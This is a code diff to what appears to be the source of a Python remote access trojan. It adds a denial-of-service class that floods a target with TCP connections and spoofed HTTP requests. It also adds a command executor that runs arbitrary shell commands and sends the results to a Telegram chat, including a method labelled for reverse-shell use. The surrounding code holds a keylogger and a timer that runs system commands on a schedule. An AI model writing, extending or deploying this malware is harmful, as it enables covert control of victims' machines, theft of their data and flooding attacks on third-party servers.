@@ -5,17 +5,20 @@ from . import settings
 
 # import built-in & third-party modules
 import datetime
+import socket
 import requests
 import json
 import platform
 import time
 import zipfile
 import os
+import random
+import subprocess
 import schedule
+
 from typing import List
 from pynput import keyboard
-from socket import gethostname, gethostbyname
-import socket
+from socket import gethostname
 from uuid import getnode as get_system_mac_addres
 from bs4 import BeautifulSoup
 from PIL import ImageGrab
@@ -45,23 +48,82 @@ class KeyLogger:
         global listener
         listener.stop()
 
+
 class ScheduleManagement:
     listOfSchedules = {}
-    
-    def __init__(self,second,command):
+
+    def __init__(self, second, command):
         self.second = second
         self.command = command
 
-    def ossystem(self,command):
+    def ossystem(self, command):
         os.system(command)
+
     def startSchedule(self):
         try:
-            schedule.every(self.second).seconds.do(self.ossystem,self.command)
+            schedule.every(self.second).seconds.do(self.ossystem, self.command)
             while self.command in self.listOfSchedules.keys():
                 schedule.run_pending()
         except:
             self.listOfSchedules.pop(self.command)
-            
+
+
+class dos:
+    def __init__(self, target, port, data, dostype):
+        self.target = target
+        self.port = port
+        self.data = data
+        self.dostype = dostype
+
+    def attack(self):
+        if self.dostype == "ACKFlood":
+            while True:
+                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                s.connect((self.target, self.port))
+                s.sendto(
+                    (self.data), (self.target, self.port)
+                )
+                s.close()
+        else:
+            fakeip = f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}'
+            while True:
+                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                s.connect((self.target, self.port))
+                s.sendto(("GET / " + self.target +
+                         " HTTP/1.1\r\n").encode('ascii'), (self.target, self.port))
+                s.sendto(("Host: " + fakeip + "\r\n\r\n").encode('ascii'),
+                         (self.target, self.port))
+                s.close()
+
+
+class execute_commands:
+    def __init__(self, command, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, timeout=5):
+        self.command = command
+        self.ADMIN_CHAT_ID = ADMIN_CHAT_ID
+        self.TELEGRAM_TOKEN = TELEGRAM_TOKEN
+        self.logger = logger
+        self.timeout = timeout
+
+    def send_message(self, text: str):
+        send_message_by_third_party_proxy(
+            text, TELEGRAM_TOKEN=self.TELEGRAM_TOKEN,
+            ADMIN_CHAT_ID=self.ADMIN_CHAT_ID, logger=self.logger)
+
+    def clean_shell_data(self, output):
+        output = str(output).replace('\\r\\n', '\n')  # cleaning data
+        output = str(output).replace('\\n', '\n')
+        output = str(output).replace("b'", '')
+        return output
+
+    def runcommand(self):
+        result = subprocess.check_output(self.command, shell=True)
+        self.send_message(f"""RE: {self.command}
+        Results: {self.clean_shell_data(result)}""")
+        return 0
+
+    def runcommand_for_reverse_shell(self):
+        result = subprocess.check_output(self.command, shell=True)
+        return result
 
 
 def get_current_epoc_time() -> float:
@@ -81,6 +143,7 @@ def get_host_name_ip() -> str:
 
 def get_my_global_ip() -> str:
     '''return system ip (3 API server)'''
+
     try:
         return get_my_ip_server_1()
 
